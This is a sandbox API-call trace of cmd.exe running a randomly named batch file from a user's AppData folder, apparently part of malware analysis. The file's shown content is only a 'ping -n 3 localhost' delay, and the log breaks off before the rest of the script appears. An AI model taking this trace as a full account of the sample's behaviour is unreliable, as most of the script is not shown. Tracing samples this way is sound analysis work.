[0115.763] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0115.763] GetEnvironmentStringsW () returned 0x420150* [0115.763] FreeEnvironmentStringsW (penv=0x420150) returned 1 [0115.763] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0115.765] GetConsoleOutputCP () returned 0x1b5 [0115.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0115.827] GetUserDefaultLCID () returned 0x409 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af8c0, cchData=128 | out: lpLCData="0") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af8c0, cchData=128 | out: lpLCData="0") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af8c0, cchData=128 | out: lpLCData="1") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0115.827] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0115.827] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0115.828] GetConsoleTitleW (in: lpConsoleTitle=0x4201e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0115.828] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0115.828] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0115.829] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0115.832] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd", _String2=")") returned 58 [0115.832] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 3 [0115.832] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 3 [0115.832] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 6 [0115.832] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 6 [0115.832] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 15 [0115.832] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd") returned 15 [0115.832] GetConsoleTitleW (in: lpConsoleTitle=0x2af5b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.833] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af374, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af36c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af36c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0115.833] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0115.833] SetErrorMode (uMode=0x0) returned 0x0 [0115.833] SetErrorMode (uMode=0x1) returned 0x0 [0115.833] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x42dc08, lpFilePart=0x2af0d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x2af0d8*="vMfCCeRYkvQy") returned 0x2d [0115.833] SetErrorMode (uMode=0x0) returned 0x1 [0115.833] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0115.834] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.837] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.837] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd", fInfoLevelId=0x1, lpFindFileData=0x2aee74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee74) returned 0x4208f0 [0115.837] FindClose (in: hFindFile=0x4208f0 | out: hFindFile=0x4208f0) returned 1 [0115.838] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0115.838] GetConsoleTitleW (in: lpConsoleTitle=0x2af34c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.838] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0115.840] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0115.841] IdentifyCodeAuthzLevelW () returned 0x1 [0115.846] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0115.846] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0115.846] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0115.846] CloseCodeAuthzLevel () returned 0x1 [0115.846] SetErrorMode (uMode=0x0) returned 0x0 [0115.847] SetErrorMode (uMode=0x1) returned 0x0 [0115.847] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd", nBufferLength=0x104, lpBuffer=0x4204e8, lpFilePart=0x2af238 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd", lpFilePart=0x2af238*="1A4qO2RH.cmd") returned 0x3a [0115.847] SetErrorMode (uMode=0x0) returned 0x1 [0115.847] CmdBatNotification () returned 0x0 [0115.847] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\1a4qo2rh.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2af27c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0115.847] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0115.847] _get_osfhandle (_FileHandle=3) returned 0x58 [0115.847] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.847] _get_osfhandle (_FileHandle=3) returned 0x58 [0115.847] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.847] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2af260, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x2af260*=0x91, lpOverlapped=0x0) returned 1 [0115.848] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0115.848] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0115.848] _get_osfhandle (_FileHandle=3) returned 0x58 [0115.848] GetFileType (hFile=0x58) returned 0x1 [0115.848] _get_osfhandle (_FileHandle=3) returned 0x58 [0115.848] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0115.848] _wcsicmp (_String1="ping", _String2=")") returned 71 [0115.848] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0115.848] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0115.848] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0115.849] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0115.849] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0115.849] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0115.849] _tell (_FileHandle=3) returned 21 [0115.849] _close (_FileHandle=3) returned 0 [0115.850] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af034 | out: _Buffer="\r\n") returned 2 [0115.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.850] GetFileType (hFile=0x7) returned 0x2 [0115.850] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.850] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff4 | out: lpMode=0x2aeff4) returned 1 [0115.850] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.850] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af020, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af020*=0x2) returned 1 [0115.850] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0115.850] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0115.850] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2af030 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0115.850] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x2af030 | out: _Buffer=">") returned 1 [0115.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.851] GetFileType (hFile=0x7) returned 0x2 [0115.851] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aeff8 | out: lpMode=0x2aeff8) returned 1 [0115.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.851] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x2af024, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x2af024*=0x19) returned 1 [0115.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.851] GetFileType (hFile=0x7) returned 0x2 [0115.851] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af27c | out: lpMode=0x2af27c) returned 1 [0115.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.851] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x420958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x2af2a8, lpReserved=0x0 | out: lpBuffer=0x420958*, lpNumberOfCharsWritten=0x2af2a8*=0x4) returned 1 [0115.851] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2af2b4 | out: _Buffer=" -n 3 localhost ") returned 16 [0115.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.852] GetFileType (hFile=0x7) returned 0x2 [0115.852] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.852] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af274 | out: lpMode=0x2af274) returned 1 [0115.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.852] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x2af2a0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2a0*=0x10) returned 1 [0115.852] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2af2d4 | out: _Buffer="\r\n") returned 2 [0115.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.852] GetFileType (hFile=0x7) returned 0x2 [0115.852] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0115.852] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af294 | out: lpMode=0x2af294) returned 1 [0115.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0115.852] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2af2c0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2af2c0*=0x2) returned 1 [0115.852] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0115.852] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0115.852] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0115.852] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0115.852] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0115.853] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0115.853] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0115.853] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0115.853] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0115.853] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0115.853] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0115.853] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0115.853] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0115.853] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0115.853] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0115.853] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0115.853] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0115.853] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0115.853] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0115.853] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0115.853] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0115.853] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0115.853] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0115.853] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0115.853] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0115.853] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0115.853] _wcsicmp (_String1="ping", _String2="START") returned -3 [0115.853] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0115.853] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0115.853] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0115.853] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0115.853] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0115.853] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0115.853] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0115.853] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0115.853] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0115.853] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0115.853] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0115.854] SetErrorMode (uMode=0x0) returned 0x0 [0115.854] SetErrorMode (uMode=0x1) returned 0x0 [0115.854] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x430550, lpFilePart=0x2af078 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af078*="Desktop") returned 0x18 [0115.854] SetErrorMode (uMode=0x0) returned 0x1 [0115.854] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0115.854] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0115.854] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.854] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x2aedf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aedf4) returned 0xffffffff [0115.855] GetLastError () returned 0x2 [0115.855] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x2aedf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aedf4) returned 0xffffffff [0115.855] GetLastError () returned 0x2 [0115.855] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x2aedf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aedf4) returned 0x430838 [0115.855] FindClose (in: hFindFile=0x430838 | out: hFindFile=0x430838) returned 1 [0115.855] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x2aedf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aedf4) returned 0xffffffff [0115.855] GetLastError () returned 0x2 [0115.855] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aedf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aedf4) returned 0x430838 [0115.855] FindClose (in: hFindFile=0x430838 | out: hFindFile=0x430838) returned 1 [0115.855] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0115.855] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0115.855] GetConsoleTitleW (in: lpConsoleTitle=0x2aee44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.856] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0115.856] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0115.856] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.856] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x2ae6e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae6e0) returned 0xffffffff [0115.856] GetLastError () returned 0x2 [0115.856] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x2ae6e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae6e0) returned 0xffffffff [0115.856] GetLastError () returned 0x2 [0115.856] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x2ae6e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae6e0) returned 0x430d80 [0115.856] FindClose (in: hFindFile=0x430d80 | out: hFindFile=0x430d80) returned 1 [0115.856] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x2ae6e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae6e0) returned 0xffffffff [0115.857] GetLastError () returned 0x2 [0115.857] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ae6e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae6e0) returned 0x430d80 [0115.857] FindClose (in: hFindFile=0x430d80 | out: hFindFile=0x430d80) returned 1 [0115.857] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0115.857] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0115.857] GetConsoleTitleW (in: lpConsoleTitle=0x2aebd8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.857] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aea60, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aeb28 | out: lpAttributeList=0x2aea60, lpSize=0x2aeb28) returned 1 [0115.857] UpdateProcThreadAttribute (in: lpAttributeList=0x2aea60, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aeb20, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aea60, lpPreviousValue=0x0) returned 1 [0115.857] GetStartupInfoW (in: lpStartupInfo=0x2aea1c | out: lpStartupInfo=0x2aea1c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0115.857] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0115.858] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aeabc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aeb08 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x2aeb08*(hProcess=0x54, hThread=0x58, dwProcessId=0xe34, dwThreadId=0xe38)) returned 1 [0116.076] CloseHandle (hObject=0x58) returned 1 [0116.076] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0116.076] GetEnvironmentStringsW () returned 0x420970* [0116.076] FreeEnvironmentStringsW (penv=0x420970) returned 1 [0116.076] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0120.013] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2ae9fc | out: lpExitCode=0x2ae9fc*=0x0) returned 1 [0120.013] CloseHandle (hObject=0x54) returned 1 [0120.013] _vsnwprintf (in: _Buffer=0x2aeb44, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aea08 | out: _Buffer="00000000") returned 8 [0120.013] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0120.013] GetEnvironmentStringsW () returned 0x422c28* [0120.014] FreeEnvironmentStringsW (penv=0x422c28) returned 1 [0120.014] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0120.014] GetEnvironmentStringsW () returned 0x422c28* [0120.014] FreeEnvironmentStringsW (penv=0x422c28) returned 1 [0120.014] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aea60 | out: lpAttributeList=0x2aea60) [0120.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.014] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.014] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0120.014] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.014] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0120.014] SetConsoleInputExeNameW () returned 0x1 [0120.014] GetConsoleOutputCP () returned 0x1b5 [0120.015] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0120.015] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.015] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\1A4qO2RH.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\1a4qo2rh.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2af27c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0120.015] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0120.015] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.015] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.016] _get_osfhandle (_FileHandle=3) returned 0x54 [0120.016] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0120.016] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2af260, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x2af260*=0x7c, lpOverlapped=0x0) returned 1 [0120.017] 